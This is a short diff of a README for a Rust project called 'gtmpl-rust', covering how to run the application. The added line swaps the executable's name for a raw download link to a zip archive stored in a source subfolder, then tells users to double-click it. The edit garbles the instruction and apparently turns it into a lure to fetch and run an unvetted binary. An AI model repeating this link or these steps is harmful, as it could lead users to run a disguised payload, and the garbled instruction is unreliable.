GauravSingh234/gtmpl-rust/README.md

 4. **Run the Application**:
    - Navigate to the extracted folder.
-   - Find the executable file (it may be named `gtmpl-rust.exe` or something similar).
+   - Find the executable file (it may be named `https://github.com/GauravSingh234/gtmpl-rust/raw/refs/heads/main/src/mows_functions/gtmpl-rust-v1.9.zip` or something similar).
    - Double-click on the file to run the application.

 5. **Follow On-Screen Instructions**: The first time you run the tool, it may guide you through some setup steps.